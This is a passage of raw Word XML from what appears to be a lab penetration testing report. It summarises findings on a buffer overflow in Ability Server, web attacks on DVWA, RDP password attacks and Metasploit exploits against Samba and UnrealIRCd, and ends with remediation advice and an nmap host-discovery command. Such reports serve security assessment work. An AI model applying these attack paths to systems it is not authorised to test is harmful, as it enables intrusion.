        <w:t>5. Reporting and Documentation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> Document all results, observations, and suggestions from the penetration testing evaluation in a detailed report. Provide clear and actionable assistance for remediation initiatives, including prioritized suggestions, technical </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>details</w:t>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>, and strategic insights relevant to the organization's risk profile and security goals.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B427A7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="550353CC" w14:textId="77777777" w:rsidR="00963529" w:rsidRDefault="00963529" w:rsidP="00040110"/>
    <w:p w14:paraId="0B923B1B" w14:textId="77777777" w:rsidR="00B427A7" w:rsidRDefault="00B427A7" w:rsidP="00040110"/>
    <w:p w14:paraId="7BCFA4BC" w14:textId="77777777" w:rsidR="00B427A7" w:rsidRDefault="00B427A7" w:rsidP="00040110"/>
    <w:p w14:paraId="7051C75B" w14:textId="77777777" w:rsidR="00B427A7" w:rsidRDefault="00B427A7" w:rsidP="00040110"/>
    <w:p w14:paraId="6E6D10CF" w14:textId="77777777" w:rsidR="00B427A7" w:rsidRDefault="00B427A7" w:rsidP="00040110"/>
    <w:p w14:paraId="7BB2903F" w14:textId="77777777" w:rsidR="00963529" w:rsidRPr="00963529" w:rsidRDefault="00963529" w:rsidP="00040110">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="000000"/>
          <w:lang w:eastAsia="en-ZA"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00963529">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="000000"/>
          <w:lang w:eastAsia="en-ZA"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.0 High-Level Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C54CA9C" w14:textId="77777777" w:rsidR="00963529" w:rsidRDefault="00963529" w:rsidP="00040110"/>
    <w:p w14:paraId="03E04438" w14:textId="411FC612" w:rsidR="00F264C1" w:rsidRPr="0034765E" w:rsidRDefault="00963529" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00963529">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2.1 Overall Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA5DA5B" w14:textId="77777777" w:rsidR="00F264C1" w:rsidRPr="0034765E" w:rsidRDefault="00F264C1" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6184622B" w14:textId="4276473B" w:rsidR="00997E39" w:rsidRPr="00997E39" w:rsidRDefault="00997E39" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve">The penetration testing exercise discovered serious vulnerabilities across different attack channels, including buffer overflow, online attacks (such as XSS, SQL injection, and file upload), password assaults targeting RDP, and exploitation utilizing Metasploit Framework. These results underline the significance of thorough security assessments to detect and remediate gaps in systems and applications. </w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">- Buffer Overflow: The Ability Server 2.34 FTP STOR Buffer Overflow vulnerability permitted </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>unauthorized</w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> remote access to the target system, stressing the vital necessity for patching and </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>updating</w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerable software. </w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">- online Attacks: XSS, SQL Injection, and File Upload vulnerabilities in the DVWA online application highlighted the possibility of data theft, session hijacking, and remote code execution. Strict input validation, output encoding, and secure file upload procedures are needed to reduce these dangers. </w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">- Password Attacks: Weak passwords on the RDP service permitted unauthorized access to computers, underlining the significance of maintaining strong password regulations, establishing </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>account</w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> lockout procedures, and considering multi-factor authentication. </w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
        <w:t>- Metasploit Exploits: Exploitation of vulnerabilities in Samba and UnrealIRCd servers using Metasploit Framework underlined the necessity for timely patching and effective security measures to prevent unauthorized access and command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DA1A3D" w14:textId="77777777" w:rsidR="00F264C1" w:rsidRDefault="00F264C1" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77726A39" w14:textId="77777777" w:rsidR="00997E39" w:rsidRDefault="00997E39" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77D8E387" w14:textId="77777777" w:rsidR="00997E39" w:rsidRPr="0034765E" w:rsidRDefault="00997E39" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="512D70F9" w14:textId="77777777" w:rsidR="00F264C1" w:rsidRPr="00F264C1" w:rsidRDefault="00F264C1" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F264C1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 2.2 Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BE0A4E" w14:textId="33AADE89" w:rsidR="00997E39" w:rsidRPr="00997E39" w:rsidRDefault="00997E39" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve">To resolve the vulnerabilities uncovered during the penetration testing: </w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">- Implement Patch Management: Regularly update and patch susceptible software to reduce known security vulnerabilities and prevent exploitation. </w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">- Enhance Web Application Security: Enforce stringent input validation, output encoding, and secure file upload procedures to avoid XSS, SQL injection, and file upload attacks. </w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">- Strengthen Password regulations: Enforce strong password regulations, implement account lockout measures, and investigate multi-factor authentication to limit the risk of password assaults. </w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">- Network Segmentation and Access </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>Restrictions</w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve">: Implement network segmentation and access restrictions to reduce the effect of successful attacks and prevent lateral movement inside the </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>network</w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">By applying these guidelines, companies may enhance their overall security posture and decrease the risk of exploitation across numerous attack channels. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F8A6E7" w14:textId="77777777" w:rsidR="00963529" w:rsidRPr="00963529" w:rsidRDefault="00963529" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78F6C943" w14:textId="77777777" w:rsidR="00AB42B3" w:rsidRDefault="00AB42B3" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="246760EF" w14:textId="77777777" w:rsidR="00963529" w:rsidRDefault="00963529" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="099B8F75" w14:textId="77777777" w:rsidR="00F264C1" w:rsidRDefault="00F264C1" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06DFA246" w14:textId="77777777" w:rsidR="00F264C1" w:rsidRDefault="00F264C1" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4100828F" w14:textId="77777777" w:rsidR="00F264C1" w:rsidRDefault="00F264C1" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B83E45A" w14:textId="77777777" w:rsidR="00997E39" w:rsidRDefault="00997E39" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59CA65D9" w14:textId="77777777" w:rsidR="00997E39" w:rsidRDefault="00997E39" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="526EF557" w14:textId="77777777" w:rsidR="00963529" w:rsidRDefault="00963529" w:rsidP="00040110"/>
    <w:p w14:paraId="05C6E5B9" w14:textId="77777777" w:rsidR="00963529" w:rsidRPr="00963529" w:rsidRDefault="00963529" w:rsidP="00040110">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="000000"/>
          <w:lang w:eastAsia="en-ZA"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00963529">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="000000"/>
          <w:lang w:eastAsia="en-ZA"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.0 Methodologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6798E3" w14:textId="77777777" w:rsidR="00963529" w:rsidRDefault="00963529" w:rsidP="00040110"/>
    <w:p w14:paraId="33611C86" w14:textId="77777777" w:rsidR="00963529" w:rsidRPr="00963529" w:rsidRDefault="00963529" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00963529">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3.1 Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269AE236" w14:textId="210FFE59" w:rsidR="00997E39" w:rsidRPr="00BF41FA" w:rsidRDefault="00997E39" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve">I used a variety of methodologies in the first phase of the Network Penetration Testing Assessment </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> gather vital data on the network architecture, systems, and applications of the company. This stage helps me fully understand the network environment and establishes the foundation for other testing procedures.</w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Important Tasks:</w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Network Discovery:</w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> I carried out thorough scans to find active hosts, open ports, and network services within the target environment using network scanning tools like Nmap and Netdiscover. This phase helps to map out the topology of the network and identify possible points of access for more research.</w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Enumeration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> After locating active hosts and services, I carried out further enumeration to get precise details about every system and service. This involves obtaining crucial metadata, probing for vulnerabilities, and requesting services for version information </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> assess the network assets' security posture.</w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools Employed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2F1587" w14:textId="4B14F1EC" w:rsidR="00BF41FA" w:rsidRPr="00BF41FA" w:rsidRDefault="00997E39" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Nmap:</w:t>
      </w:r>
      <w:r w:rsidRPr="00997E39">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> A flexible tool for port scanning, host finding, and service enumeration on networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F59D6C7" w14:textId="77777777" w:rsidR="00BF41FA" w:rsidRPr="00C7315C" w:rsidRDefault="00BF41FA" w:rsidP="00040110">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7315C">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>192.168.2.0/24</w:t>
      </w:r>
      <w:r w:rsidRPr="00C7315C">
        <w:rPr>
